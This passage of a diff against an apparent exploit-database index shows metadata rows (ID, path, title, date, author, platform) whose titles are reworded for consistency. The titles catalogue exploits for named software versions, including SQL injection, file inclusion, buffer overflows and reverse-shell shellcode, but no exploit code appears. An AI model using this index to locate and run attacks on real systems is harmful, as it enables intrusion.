Exploit",2010-03-31,"Easy Laster",php,webapps,0 11981,platforms/windows/local/11981.py,"WM Downloader 3.0.0.9 - (.asx) Local Buffer Overflow",2010-03-31,b0telh0,windows,local,0 11984,platforms/windows/dos/11984.py,"Optimal Archive 1.38 - (.zip) SEH PoC (0Day)",2010-03-31,TecR0c,windows,dos,0 @@ -11023,7 +11023,7 @@ id,file,description,date,author,platform,type,port 12073,platforms/windows/dos/12073.pl,"MP3 Wav Editor 3.80 - (.mp3) Local DoS",2010-04-05,anonymous,windows,dos,0 12074,platforms/windows/dos/12074.pl,"Portable AVS DVD Authoring 1.3.3.51 - Local Crash PoC",2010-04-05,R3d-D3V!L,windows,dos,0 12075,platforms/php/webapps/12075.txt,"LionWiki 3.x - (index.php) Shell Upload",2010-04-05,ayastar,php,webapps,0 -12076,platforms/php/webapps/12076.pl,"ilchClan 1.0.5 - (cid) SQL Injection & Exploit",2010-04-05,"Easy Laster",php,webapps,0 +12076,platforms/php/webapps/12076.pl,"ilchClan 1.0.5 - (cid) SQL Injection",2010-04-05,"Easy Laster",php,webapps,0 12077,platforms/php/webapps/12077.txt,"Joomla Component News Portal com_news Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0 12078,platforms/php/webapps/12078.txt,"Joomla Freestyle FAQ Lite Component 1.3 com_fss (faqid) SQL Injection",2010-04-06,"Chip d3 bi0s",php,webapps,0 12079,platforms/windows/dos/12079.pl,"Microsoft Office (2010 beta) Communicator SIP Denial of Service Exploit",2010-04-06,indoushka,windows,dos,0 @@ -11136,7 +11136,7 @@ id,file,description,date,author,platform,type,port 12192,platforms/php/webapps/12192.txt,"blog system 1.5 - Multiple Vulnerabilities",2010-04-13,"cp77fk4r ",php,webapps,0 12193,platforms/php/webapps/12193.txt,"Openurgence vaccin 1.03 - (RFI/LFI) Multiple File Include",2010-04-13,"cr4wl3r ",php,webapps,0 12194,platforms/php/webapps/12194.txt,"Police Municipale Open Main Courante 1.01beta - (RFI/LFI) Multiple File Include",2010-04-13,"cr4wl3r ",php,webapps,0 -12195,platforms/php/webapps/12195.rb,"joelz bulletin board 0.9.9rc3 - Multiple SQL Injection & Exploit",2010-04-13,"Easy Laster",php,webapps,0 +12195,platforms/php/webapps/12195.rb,"joelz bulletin board 0.9.9rc3 - Multiple SQL Injection",2010-04-13,"Easy Laster",php,webapps,0 12197,platforms/asp/webapps/12197.txt,"Mp3 MuZik Data Base Download",2010-04-13,indoushka,asp,webapps,0 12198,platforms/php/webapps/12198.txt,"Games Script (Galore) Backup Dump",2010-04-13,indoushka,php,webapps,0 12199,platforms/asp/webapps/12199.txt,"My School Script Data Base Download",2010-04-13,indoushka,asp,webapps,0 @@ -11306,7 +11306,7 @@ id,file,description,date,author,platform,type,port 12386,platforms/php/webapps/12386.txt,"PHP Classifieds 6.09 - E-mail Dump",2010-04-25,indoushka,php,webapps,0 12387,platforms/php/webapps/12387.sh,"webessence 1.0.2 - Multiple Vulnerabilities",2010-04-25,r00t,php,webapps,0 12388,platforms/windows/local/12388.rb,"WM Downloader 3.0.0.9 - Buffer Overflow (Metasploit)",2010-04-25,blake,windows,local,0 -12395,platforms/php/webapps/12395.txt,"2DayBiz Advanced Poll Script - XSS and Authentication Bypass",2010-04-26,Sid3^effects,php,webapps,0 +12395,platforms/php/webapps/12395.txt,"2DayBiz Advanced Poll Script - XSS / Authentication Bypass",2010-04-26,Sid3^effects,php,webapps,0 12396,platforms/php/webapps/12396.txt,"OpenCominterne 1.01 - Local File Inclusion",2010-04-26,"cr4wl3r ",php,webapps,0 12398,platforms/php/webapps/12398.txt,"Opencourrier 2.03beta - (RFI/LFI) Multiple File Include",2010-04-26,"cr4wl3r ",php,webapps,0 12399,platforms/php/webapps/12399.txt,"Uiga Personal Portal index.php (view) SQL Injection",2010-04-26,41.w4r10r,php,webapps,0 @@ -11355,7 +11355,7 @@ id,file,description,date,author,platform,type,port 12445,platforms/php/webapps/12445.txt,"Articles Directory - Authenication Bypass",2010-04-29,Sid3^effects,php,webapps,0 12446,platforms/php/webapps/12446.txt,"TR Forum 1.5 - Multiple Vulnerabilities",2010-04-29,indoushka,php,webapps,0 12447,platforms/php/webapps/12447.txt,"XT-Commerce 1.0 Beta 1 - Pass / Creat and Download Backup",2010-04-29,indoushka,php,webapps,0 -12448,platforms/php/webapps/12448.txt,"Socialware 2.2 - Upload and XSS",2010-04-29,Sid3^effects,php,webapps,0 +12448,platforms/php/webapps/12448.txt,"Socialware 2.2 - Upload / XSS",2010-04-29,Sid3^effects,php,webapps,0 12449,platforms/php/webapps/12449.txt,"DZCP (deV!L_z Clanportal) 1.5.3 - Multiple Vulnerabilities",2010-04-29,indoushka,php,webapps,0 12450,platforms/windows/webapps/12450.txt,"Microsoft SharePoint Server 2007 - XSS",2010-04-29,"High-Tech Bridge SA",windows,webapps,0 12451,platforms/php/webapps/12451.txt,"iScripts VisualCaster - SQli",2010-04-29,Sid3^effects,php,webapps,0 @@ -11457,7 +11457,7 @@ id,file,description,date,author,platform,type,port 12558,platforms/php/webapps/12558.txt,"29o3 CMS - (LibDir) Multiple RFI",2010-05-10,eidelweiss,php,webapps,0 12560,platforms/php/webapps/12560.txt,"724CMS Enterprise 4.59 - SQL Injection",2010-05-10,cyberlog,php,webapps,0 12561,platforms/php/webapps/12561.txt,"PHPKB Knowledge Base Software 2.0 - Multilanguage Support Multi SQL Injection",2010-05-10,R3d-D3V!L,php,webapps,0 -12562,platforms/php/webapps/12562.txt,"Waibrasil Remote / Local File Inclusion",2010-05-10,eXeSoul,php,webapps,0 +12562,platforms/php/webapps/12562.txt,"Waibrasil - Remote File Inclusion / Local File Inclusion",2010-05-10,eXeSoul,php,webapps,0 12563,platforms/php/webapps/12563.txt,"Fiomental & Coolsis Backoffice - Multiple Vulnerabilities",2010-05-10,MasterGipy,php,webapps,0 12564,platforms/windows/dos/12564.txt,"Microsoft Windows Outlook Express and Windows Mail Integer Overflow",2010-05-11,"Francis Provencher",windows,dos,0 12565,platforms/php/webapps/12565.txt,"724CMS Enterprise 4.59 - (section.php) LFI",2010-05-11,CoBRa_21,php,webapps,0 @@ -11519,7 +11519,7 @@ id,file,description,date,author,platform,type,port 12624,platforms/php/webapps/12624.txt,"LinPHA 1.3.2 - (rotate.php) Remote Command Execution",2010-05-16,"Sn!pEr.S!Te Hacker",php,webapps,0 12628,platforms/php/webapps/12628.txt,"EgO 0.7b - (fckeditor) Remote File Upload",2010-05-16,ITSecTeam,php,webapps,0 12629,platforms/php/webapps/12629.txt,"Tainos - Multiple Vulnerabilities",2010-05-16,XroGuE,php,webapps,0 -12630,platforms/php/webapps/12630.txt,"I-Vision CMS - XSS & SQL Injection",2010-05-16,Ariko-Security,php,webapps,0 +12630,platforms/php/webapps/12630.txt,"I-Vision CMS - XSS / SQL Injection",2010-05-16,Ariko-Security,php,webapps,0 12631,platforms/php/webapps/12631.txt,"Tainos Webdesign (All Scripts) SQL/XSS/HTML Injection",2010-05-17,CoBRa_21,php,webapps,0 12632,platforms/php/webapps/12632.txt,"Joomla Component com_crowdsource SQL Injection",2010-05-17,ByEge,php,webapps,0 12633,platforms/php/webapps/12633.txt,"Joomla Component com_event - Multiple Vulnerabilities",2010-05-17,"ALTBTA ",php,webapps,0 @@ -11530,7 +11530,7 @@ id,file,description,date,author,platform,type,port 12639,platforms/php/webapps/12639.txt,"Joomla Component com_event - SQL Injection",2010-05-17,anonymous,php,webapps,0 12640,platforms/windows/webapps/12640.txt,"Abyss Web Server X1 - CSRF",2010-05-17,"John Leitch",windows,webapps,0 12641,platforms/php/webapps/12641.txt,"JE CMS 1.1 - SQL Injection",2010-05-17,AntiSecurity,php,webapps,0 -12642,platforms/php/webapps/12642.txt,"phpMyAdmin 2.6.3-pl1 - Cross-Site Scripting and Full Path",2010-05-18,"cp77fk4r ",php,webapps,0 +12642,platforms/php/webapps/12642.txt,"phpMyAdmin 2.6.3-pl1 - Cross-Site Scripting / Full Path",2010-05-18,"cp77fk4r ",php,webapps,0 12643,platforms/php/webapps/12643.pl,"ChillyCMS Blind SQL Injection",2010-05-18,IHTeam,php,webapps,0 12644,platforms/php/webapps/12644.txt,"WebJaxe SQL Injection",2010-05-18,IHTeam,php,webapps,0 12645,platforms/php/webapps/12645.txt,"TS Special Edition 7.0 - Multiple Vulnerabilities",2010-05-18,IHTeam,php,webapps,0 @@ -11571,7 +11571,7 @@ id,file,description,date,author,platform,type,port 28051,platforms/windows/dos/28051.py,"PotPlayer 1.5.39036 - (.wav) Crash PoC",2013-09-03,ariarat,windows,dos,0 28128,platforms/php/webapps/28128.txt,"CMS Mini 0.2.2 - Multiple Vulnerabilities",2013-09-06,SANTHO,php,webapps,80 12679,platforms/windows/webapps/12679.txt,"3Com* iMC (Intelligent Management Center) - Unauthenticated File Retrieval (traversal)",2010-05-21,"Richard Brain",windows,webapps,0 -12680,platforms/windows/webapps/12680.txt,"3Com* iMC (Intelligent Management Center) - Various XSS and Information Disclosure Flaws",2010-05-21,"Richard Brain",windows,webapps,0 +12680,platforms/windows/webapps/12680.txt,"3Com* iMC (Intelligent Management Center) - XSS / Information Disclosure Flaws",2010-05-21,"Richard Brain",windows,webapps,0 12683,platforms/windows/dos/12683.pl,"Solarwinds 10.4.0.10 - TFTP DoS",2010-05-21,Nullthreat,windows,dos,69 12684,platforms/php/webapps/12684.txt,"ConPresso 4.0.7 - SQL Injection",2010-05-21,Gamoscu,php,webapps,0 12686,platforms/php/webapps/12686.txt,"Online University (Auth Bypass) SQL Injection",2010-05-21,"cr4wl3r ",php,webapps,0 @@ -12098,8 +12098,8 @@ id,file,description,date,author,platform,type,port 13736,platforms/php/webapps/13736.txt,"DDLCMS 2.1 - (skin) Remote File Inclusion",2010-06-06,eidelweiss,php,webapps,0 13737,platforms/php/webapps/13737.txt,"Joomla Component com_djartgallery - Multiple Vulnerabilities",2010-06-06,d0lc3,php,webapps,0 13738,platforms/php/webapps/13738.txt,"PHP Director 0.2 - SQL Injection",2010-06-06,Mr.Rat,php,webapps,0 -13739,platforms/php/webapps/13739.txt,"WmsCMS - XSS & SQL Injection",2010-06-06,Ariko-Security,php,webapps,0 -13740,platforms/php/webapps/13740.txt,"iScripts eSwap 2.0 - SQLi and XSS",2010-06-06,Sid3^effects,php,webapps,0 +13739,platforms/php/webapps/13739.txt,"WmsCMS - XSS / SQL Injection",2010-06-06,Ariko-Security,php,webapps,0 +13740,platforms/php/webapps/13740.txt,"iScripts eSwap 2.0 - SQLi / XSS",2010-06-06,Sid3^effects,php,webapps,0 13741,platforms/php/webapps/13741.txt,"iScripts easybiller 1.1 - SQL Injection",2010-06-06,Sid3^effects,php,webapps,0 13742,platforms/lin_x86/shellcode/13742.c,"Linux/x86 - chown root:root /bin/sh shellcode (48 bytes)",2010-06-06,gunslinger_,lin_x86,shellcode,0 13743,platforms/lin_x86/shellcode/13743.c,"Linux/x86 - give all user root access when execute /bin/sh shellcode (45 bytes)",2010-06-06,gunslinger_,lin_x86,shellcode,0 @@ -12113,8 +12113,8 @@ id,file,description,date,author,platform,type,port 13749,platforms/php/webapps/13749.txt,"idevspot Text ads 2.08 - SQLi",2010-06-06,Sid3^effects,php,webapps,0 13750,platforms/php/webapps/13750.txt,"WebBiblio Subject Gateway System LFI",2010-06-06,AntiSecurity,php,webapps,0 13751,platforms/php/webapps/13751.txt,"greeting card Remote Upload",2010-06-06,Mr.Benladen,php,webapps,0 -13752,platforms/php/webapps/13752.txt,"reVou Twitter Clone 2.0 Beta - SQL Injection and XSS",2010-06-06,Sid3^effects,php,webapps,0 -13754,platforms/multiple/webapps/13754.txt,"JForum 2.1.8 bookmarks CSRF & XSS",2010-06-07,"Adam Baldwin",multiple,webapps,0 +13752,platforms/php/webapps/13752.txt,"reVou Twitter Clone 2.0 Beta - SQL Injection / XSS",2010-06-06,Sid3^effects,php,webapps,0 +13754,platforms/multiple/webapps/13754.txt,"JForum 2.1.8 bookmarks CSRF / XSS",2010-06-07,"Adam Baldwin",multiple,webapps,0 13756,platforms/windows/local/13756.py,"VUPlayer 2.49 - (.m3u) Universal Buffer Overflow Exploit (DEP bypass)",2010-06-07,mr_me,windows,local,0 13760,platforms/windows/local/13760.py,"Audio Converter 8.1 - Stack Buffer Overflow PoC Exploit (0Day)",2010-06-07,sud0,windows,local,0 13761,platforms/windows/local/13761.pl,"Easy CD-DA Recorder 2007 - SEH Buffer Overflow",2010-06-07,chap0,windows,local,0 @@ -12138,8 +12138,8 @@ id,file,description,date,author,platform,type,port 13782,platforms/php/webapps/13782.txt,"Image Store Remote file Upload",2010-06-08,Mr.FireStormm,php,webapps,0 13783,platforms/php/webapps/13783.txt,"GREEZLE - Global Real Estate Agent Site Auth SQL Injection",2010-06-09,"L0rd CrusAd3r",php,webapps,0 13784,platforms/php/webapps/13784.txt,"HauntmAx CMS Haunted House Directory Listing SQL Injection",2010-06-09,Sid3^effects,php,webapps,0 -13785,platforms/php/webapps/13785.txt,"eLms Pro - SQLi and XSS",2010-06-09,Sid3^effects,php,webapps,0 -13786,platforms/php/webapps/13786.txt,"PGAUTOPro - SQLi and XSS",2010-06-09,Sid3^effects,php,webapps,0 +13785,platforms/php/webapps/13785.txt,"eLms Pro - SQLi / XSS",2010-06-09,Sid3^effects,php,webapps,0 +13786,platforms/php/webapps/13786.txt,"PGAUTOPro - SQLi / XSS",2010-06-09,Sid3^effects,php,webapps,0 13787,platforms/multiple/remote/13787.txt,"Adobe Flash and Reader - Exploit PoC (0Day)",2010-06-09,Unknown,multiple,remote,0 13788,platforms/asp/webapps/13788.txt,"Web Wiz Forums 9.68 - SQLi",2010-06-09,Sid3^effects,asp,webapps,0 13789,platforms/asp/webapps/13789.txt,"Virtual Real Estate Manager 3.5 - SQLi",2010-06-09,Sid3^effects,asp,webapps,0 @@ -12149,7 +12149,7 @@ id,file,description,date,author,platform,type,port 14334,platforms/lin_x86/shellcode/14334.c,"Linux/x86 - netcat connect back port 8080 shellcode (76 bytes)",2010-07-11,blake,lin_x86,shellcode,0 13792,platforms/php/webapps/13792.txt,"Joomla component cinema SQL Injection",2010-06-09,Sudden_death,php,webapps,0 13793,platforms/asp/webapps/13793.txt,"Online Notebook Manager - SQLi",2010-06-09,"L0rd CrusAd3r",asp,webapps,0 -13794,platforms/multiple/webapps/13794.txt,"Joomla 1.5 Jreservation Component - SQLi And XSS",2010-06-09,Sid3^effects,multiple,webapps,0 +13794,platforms/multiple/webapps/13794.txt,"Joomla 1.5 Jreservation Component - SQLi / XSS",2010-06-09,Sid3^effects,multiple,webapps,0 27972,platforms/php/webapps/27972.txt,"ESTsoft InternetDisk Arbitrary File Upload and Script Execution",2006-06-05,Kil13r,php,webapps,0 27973,platforms/php/webapps/27973.txt,"Bookmark4U 2.0 - inc/dbase.php env[include_prefix] Parameter Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps,0 27974,platforms/php/webapps/27974.txt,"Bookmark4U 2.0 - inc/config.php env[include_prefix] Parameter Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps,0 @@ -12158,16 +12158,16 @@ id,file,description,date,author,platform,type,port 13798,platforms/php/webapps/13798.txt,"joomla com_jcommunity SQLi",2010-06-09,Sid3^effects,php,webapps,0 13799,platforms/php/webapps/13799.txt,"joomla com_jmarket SQLi",2010-06-09,Sid3^effects,php,webapps,0 13800,platforms/php/webapps/13800.txt,"joomla com_jsubscription SQLi",2010-06-09,Sid3^effects,php,webapps,0 -13801,platforms/php/webapps/13801.txt,"Science Fair In A Box - SQLi & XSS",2010-06-09,"L0rd CrusAd3r",php,webapps,0 +13801,platforms/php/webapps/13801.txt,"Science Fair In A Box - SQLi / XSS",2010-06-09,"L0rd CrusAd3r",php,webapps,0 13802,platforms/php/webapps/13802.txt,"PHP Real Estate Script - SQLi",2010-06-09,"L0rd CrusAd3r",php,webapps,0 13803,platforms/php/webapps/13803.txt,"PHPAccess - SQLi",2010-06-09,"L0rd CrusAd3r",php,webapps,0 13804,platforms/php/webapps/13804.txt,"joomla com_jnewsletter - SQLi",2010-06-09,Sid3^effects,php,webapps,0 -13805,platforms/php/webapps/13805.txt,"PHP Property Rental Script - SQLi & XSS",2010-06-09,"L0rd CrusAd3r",php,webapps,0 +13805,platforms/php/webapps/13805.txt,"PHP Property Rental Script - SQLi / XSS",2010-06-09,"L0rd CrusAd3r",php,webapps,0 13806,platforms/windows/local/13806.txt,"ActivePerl 5.8.8.817 - Buffer Overflow",2010-06-09,PoisonCode,windows,local,0 13807,platforms/php/webapps/13807.py,"BtiTracker 1.3.x < 1.4.x - Exploit",2010-06-09,TinKode,php,webapps,0 13808,platforms/windows/remote/13808.txt,"Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly",2010-06-10,"Tavis Ormandy",windows,remote,0 13810,platforms/php/webapps/13810.php,"AWCM CMS - Local File Inclusion",2010-06-10,SwEET-DeViL,php,webapps,0 -13812,platforms/php/webapps/13812.txt,"SchoolMation 2.3 - SQLi and XSS",2010-06-10,Sid3^effects,php,webapps,0 +13812,platforms/php/webapps/13812.txt,"SchoolMation 2.3 - SQLi / XSS",2010-06-10,Sid3^effects,php,webapps,0 13813,platforms/php/webapps/13813.html,"Store Locator Remote Add Admin Exploit CSRF",2010-06-10,JaMbA,php,webapps,0 13814,platforms/asp/webapps/13814.txt,"Pars Design CMS Arbitrary File Upload",2010-06-10,Securitylab.ir,asp,webapps,0 13815,platforms/asp/webapps/13815.pl,"Netvolution CMS 2.x SQL Injection Exploit Script",2010-06-10,"amquen and krumel",asp,webapps,0 @@ -12206,7 +12206,7 @@ id,file,description,date,author,platform,type,port 13850,platforms/multiple/remote/13850.pl,"Litespeed Technologies Web Server Remote Poison null byte Exploit",2010-06-13,kingcope,multiple,remote,80 13852,platforms/php/webapps/13852.txt,"phpplanner PHP Planner 0.4 - Multiple Vulnerabilities",2010-06-13,"cp77fk4r ",php,webapps,0 13853,platforms/linux/remote/13853.pl,"Unreal IRCD 3.2.8.1 - Remote Downloader/Execute Trojan",2010-06-13,anonymous,linux,remote,0 -13854,platforms/php/webapps/13854.txt,"UTStats - XSS & SQL Injection & Full path disclosure",2010-06-13,"LuM Member",php,webapps,0 +13854,platforms/php/webapps/13854.txt,"UTStats - XSS / SQL Injection / Full path disclosure",2010-06-13,"LuM Member",php,webapps,0 13855,platforms/php/webapps/13855.txt,"Eyeland Studio Inc. SQL Injection",2010-06-13,Mr.P3rfekT,php,webapps,0 13856,platforms/php/webapps/13856.txt,"Yamamah Photo Gallery 1.00 - (download.php) Local File Disclosure",2010-06-13,mat,php,webapps,0 13857,platforms/php/webapps/13857.txt,"Yamamah Photo Gallery 1.00 SQL Injection (calbums)",2010-06-13,CoBRa_21,php,webapps,0 @@ -12283,7 +12283,7 @@ id,file,description,date,author,platform,type,port 13940,platforms/windows/local/13940.pl,"Orbital Viewer 1.04 - (.ov) Local Universal Stack Overflow Exploit (SEH)",2010-06-19,Crazy_Hacker,windows,local,0 13942,platforms/windows/local/13942.pl,"MoreAmp - (.maf) Local Stack Buffer Overflow (SEH) (calc)",2010-06-20,Madjix,windows,local,0 13943,platforms/lin_x86-64/shellcode/13943.c,"Linux/x86-64 - Add root user _shell-storm_ with password _leet_ shellcode (390 bytes)",2010-06-20,"Jonathan Salwan",lin_x86-64,shellcode,0 -13944,platforms/php/webapps/13944.txt,"SimpleAssets Authentication Bypass & XSS",2010-06-20,"L0rd CrusAd3r",php,webapps,0 +13944,platforms/php/webapps/13944.txt,"SimpleAssets Authentication Bypass / XSS",2010-06-20,"L0rd CrusAd3r",php,webapps,0 13945,platforms/php/webapps/13945.txt,"iBoutique (page) SQL Injection and XSS",2010-06-20,"L0rd CrusAd3r",php,webapps,0 13946,platforms/php/webapps/13946.txt,"Overstock Script SQL Injection",2010-06-20,"L0rd CrusAd3r",php,webapps,0 13947,platforms/php/webapps/13947.txt,"PHP Calendars Script SQL Injection",2010-06-20,"L0rd CrusAd3r",php,webapps,0 @@ -12337,7 +12337,7 @@ id,file,description,date,author,platform,type,port 14001,platforms/multiple/webapps/14001.txt,"InterScan Web Security Virtual Appliance 5.0 - Arbitrary File Download",2010-06-23,"Ivan Huertas",multiple,webapps,0 14002,platforms/freebsd/local/14002.c,"FreeBSD Kernel - nfs_mount() Exploit",2010-06-23,"Patroklos Argyroudis",freebsd,local,0 14003,platforms/freebsd/dos/14003.c,"FreeBSD Kernel - mountnfs() Exploit",2010-06-23,"Patroklos Argyroudis",freebsd,dos,0 -14004,platforms/multiple/webapps/14004.txt,"InterScan Web Security 5.0 - Arbitrary File Upload & Local Privilege Escalation",2010-06-23,"Ivan Huertas",multiple,webapps,0 +14004,platforms/multiple/webapps/14004.txt,"InterScan Web Security 5.0 - Arbitrary File Upload / Local Privilege Escalation",2010-06-23,"Ivan Huertas",multiple,webapps,0 14005,platforms/php/webapps/14005.txt,"2DayBiz MLM Script - SQL Injection",2010-06-23,JaMbA,php,webapps,0 14007,platforms/php/webapps/14007.txt,"Custom Business Card script SQL Injection",2010-06-23,JaMbA,php,webapps,0 14008,platforms/php/webapps/14008.txt,"2DayBiz matrimonial Script - SQL Injection",2010-06-23,JaMbA,php,webapps,0 @@ -12369,7 +12369,7 @@ id,file,description,date,author,platform,type,port 14047,platforms/php/webapps/14047.txt,"2DayBiz Matrimonial Script - SQL Injection / Cross-Site Scripting",2010-06-25,Sangteamtham,php,webapps,0 14048,platforms/php/webapps/14048.txt,"2DayBiz - Multiple SQL Injections",2010-06-25,Sangteamtham,php,webapps,0 14049,platforms/php/webapps/14049.html,"Allomani Songs & Clips Script 2.7.0 - (CSRF) Add Admin Account",2010-06-25,G0D-F4Th3rG0D-F4Th3r,php,webapps,0 -14050,platforms/php/webapps/14050.txt,"ARSC Really Simple Chat 3.3 - Remote File Inclusion & XSS",2010-06-25,"Zer0 Thunder",php,webapps,0 +14050,platforms/php/webapps/14050.txt,"ARSC Really Simple Chat 3.3 - Remote File Inclusion / XSS",2010-06-25,"Zer0 Thunder",php,webapps,0 14051,platforms/php/webapps/14051.txt,"2daybiz B2B Portal Script (selling_buy_leads1.php) SQL Injection",2010-06-25,r45c4l,php,webapps,0 14052,platforms/windows/shellcode/14052.c,"Windows - WinExec cmd.exe + ExitProcess Shellcode (195 bytes)",2010-06-25,RubberDuck,windows,shellcode,0 14053,platforms/php/webapps/14053.txt,"snipe gallery Script SQL Injection",2010-06-25,"dev!l ghost",php,webapps,0 @@ -12527,7 +12527,7 @@ id,file,description,date,author,platform,type,port 14242,platforms/php/webapps/14242.txt,"BS Classifieds Ads (articlesdetails.php) SQL Injection Proof of Concept",2010-07-06,"Easy Laster",php,webapps,0 14243,platforms/php/webapps/14243.txt,"BS Events Directory (articlesdetails.php) SQL Injection Proof of Concept",2010-07-06,"Easy Laster",php,webapps,0 14244,platforms/php/webapps/14244.txt,"Lyrics 3.0 - Engine SQL Injection",2010-07-06,Sid3^effects,php,webapps,0 -14245,platforms/php/webapps/14245.txt,"Pre Multi-Vendor Shopping Malls SQL Injection & Auth Bypass",2010-07-06,**RoAd_KiLlEr**,php,webapps,0 +14245,platforms/php/webapps/14245.txt,"Pre Multi-Vendor Shopping Malls SQL Injection / Auth Bypass",2010-07-06,**RoAd_KiLlEr**,php,webapps,0 14248,platforms/windows/remote/14248.py,"minerCPP 0.4b Remote BOF+Format String Attack Exploit",2010-07-06,l3D,windows,remote,0 14249,platforms/php/webapps/14249.txt,"Joomla com_autartimonial - SQLi",2010-07-06,Sid3^effects,php,webapps,0 14251,platforms/php/webapps/14251.txt,"PsNews 1.3 - SQL Injection",2010-07-06,S.W.T,php,webapps,0 @@ -12546,7 +12546,7 @@ id,file,description,date,author,platform,type,port 14267,platforms/windows/remote/14267.txt,"EA Battlefield 2 and Battlefield 2142 - Multiple Arbitrary File Upload Vulnerabilities",2010-07-08,"Luigi Auriemma",windows,remote,0 14268,platforms/multiple/dos/14268.txt,"Qt 4.6.3 - 'QSslSocketBackendPrivate::transmit()' Denial of Service",2010-07-08,"Luigi Auriemma",multiple,dos,0 14269,platforms/windows/remote/14269.html,"FathFTP 1.7 - ActiveX Buffer Overflow",2010-07-08,blake,windows,remote,0 -14270,platforms/php/webapps/14270.txt,"Zylone IT Multiple Blind SQL Injection",2010-07-08,Callo,php,webapps,0 +14270,platforms/php/webapps/14270.txt,"Zylone IT - Multiple Blind SQL Injection",2010-07-08,Callo,php,webapps,0 14271,platforms/php/webapps/14271.txt,"pithcms (theme) Local Remote File inclusion",2010-07-08,eidelweiss,php,webapps,0 14272,platforms/osx/remote/14272.py,"UFO: Alien Invasion 2.2.1 - IRC Client Remote Code Execution - OS X Snow Leopard (ROP)",2010-07-08,d1dn0t,osx,remote,0 14275,platforms/windows/remote/14275.txt,"Real Player 12.0.0.879 - (0Day)",2010-07-08,webDEViL,windows,remote,0 @@ -12970,7 +12970,7 @@ id,file,description,date,author,platform,type,port 14830,platforms/linux/local/14830.py,"nginx 0.6.38 - Heap Corruption Exploit",2010-08-29,"Aaron Conole",linux,local,0 14831,platforms/windows/local/14831.rb,"SnackAmp 3.1.2 - SMP Buffer Overflow (SEH)",2010-08-29,"James Fitts",windows,local,0 14832,platforms/windows/dos/14832.rb,"SnackAmp 3.1.2 - (.wav) Buffer Overflow (PoC)",2010-08-29,"James Fitts",windows,dos,0 -14833,platforms/php/webapps/14833.txt,"vBulletin 3.8.4 & 3.8.5 Registration Bypass",2010-08-29,"Immortal Boy",php,webapps,0 +14833,platforms/php/webapps/14833.txt,"vBulletin 3.8.4 / 3.8.5 Registration Bypass",2010-08-29,"Immortal Boy",php,webapps,0 14834,platforms/php/webapps/14834.txt,"Max's Guestbook - (HTML Injection/XSS) Multiple Vulnerabilities",2010-08-29,"MiND C0re",php,webapps,0 14835,platforms/php/webapps/14835.txt,"Multi-lingual E-Commerce System 0.2 - Multiple Remote File Inclusion",2010-08-29,JosS,php,webapps,0 14837,platforms/php/webapps/14837.txt,"CF Image Hosting Script 1.3.8 - Remote File Inclusion",2010-08-29,"FoX HaCkEr",php,webapps,0 @@ -13090,7 +13090,7 @@ id,file,description,date,author,platform,type,port 15013,platforms/windows/local/15013.pl,"MP3 Workstation 9.2.1.1.2 - SEH Exploit",2010-09-15,"sanjeev gupta",windows,local,0 15014,platforms/php/webapps/15014.txt,"pixelpost 1.7.3 - Multiple Vulnerabilities",2010-09-15,Sweet,php,webapps,0 15016,platforms/windows/remote/15016.rb,"Integard Pro 2.2.0.9026 - Windows 7 ROP-Code (Metasploit)",2010-09-15,Node,windows,remote,0 -36828,platforms/java/webapps/36828.txt,"JaWiki 'versionNo' Parameter Cross Site Scripting",2012-02-17,sonyy,java,webapps,0 +36828,platforms/java/webapps/36828.txt,"JaWiki 'versionNo' Parameter Cross-Site Scripting",2012-02-17,sonyy,java,webapps,0 15017,platforms/windows/dos/15017.py,"Chalk Creek Media Player 1.0.7 - (.mp3 / .wma) Denial of Service",2010-09-16,"Carlos Mario Penagos Hollmann",windows,dos,0 15018,platforms/asp/webapps/15018.txt,"mojoportal - Multiple Vulnerabilities",2010-09-16,Abysssec,asp,webapps,0 15019,platforms/windows/dos/15019.txt,"Microsoft Excel - HFPicture Record Parsing Remote Code Execution",2010-09-16,Abysssec,windows,dos,0 @@ -13298,7 +13298,7 @@ id,file,description,date,author,platform,type,port 15274,platforms/linux/local/15274.txt,"GNU C library dynamic linker - $ORIGIN expansion",2010-10-18,"Tavis Ormandy",linux,local,0 15279,platforms/windows/local/15279.rb,"FatPlayer 0.6b - (.wav) Buffer Overflow (SEH)",2010-10-18,"James Fitts",windows,local,0 15280,platforms/php/webapps/15280.html,"Travel Portal Script Admin Password Change - CSRF",2010-10-19,KnocKout,php,webapps,0 -15276,platforms/php/webapps/15276.txt,"411cc Multiple SQL Injection",2010-10-18,KnocKout,php,webapps,0 +15276,platforms/php/webapps/15276.txt,"411cc - Multiple SQL Injection",2010-10-18,KnocKout,php,webapps,0 15277,platforms/php/webapps/15277.txt,"GeekLog 1.7.0 - (fckeditor) Arbitrary File Upload",2010-10-18,"Kubanezi AHG",php,webapps,0 15278,platforms/php/webapps/15278.txt,"CubeCart 2.0.1 - SQL Injection",2010-10-18,X_AviaTique_X,php,webapps,0 15281,platforms/php/webapps/15281.html,"Event Ticket Portal Script Admin Password Change - CSRF",2010-10-19,KnocKout,php,webapps,0 @@ -13660,7 +13660,7 @@ id,file,description,date,author,platform,type,port 15729,platforms/windows/local/15729.py,"PowerShell XP 3.0.1 - Buffer Overflow (0Day)",2010-12-12,m_101,windows,local,0 15730,platforms/windows/local/15730.rb,"SnackAmp 3.1.3 - SMP Buffer Overflow (SEH)",2010-12-12,"James Fitts",windows,local,0 15733,platforms/windows/remote/15733.html,"Crystal Reports Viewer 12.0.0.549 - ActiveX Exploit (PrintControl.dll) (0Day)",2010-12-14,Dr_IDE,windows,remote,0 -15735,platforms/php/webapps/15735.txt,"MantisBT 1.2.3 (db_type) - Cross-Site Scripting & Path Disclosure",2010-12-15,LiquidWorm,php,webapps,0 +15735,platforms/php/webapps/15735.txt,"MantisBT 1.2.3 (db_type) - Cross-Site Scripting / Path Disclosure",2010-12-15,LiquidWorm,php,webapps,0 15736,platforms/php/webapps/15736.txt,"MantisBT 1.2.3 (db_type) - Local File Inclusion",2010-12-15,LiquidWorm,php,webapps,0 15737,platforms/cgi/webapps/15737.txt,"Google Urchin 5.7.03 - LFI (0Day)",2010-12-15,"Kristian Erik Hermansen",cgi,webapps,0 15738,platforms/windows/dos/15738.pl,"Digital Audio Editor 7.6.0.237 - Local Crash PoC",2010-12-15,h1ch4m,windows,dos,0 @@ -13750,7 +13750,7 @@ id,file,description,date,author,platform,type,port 15832,platforms/php/webapps/15832.txt,"Interact 2.4.1 - SQL 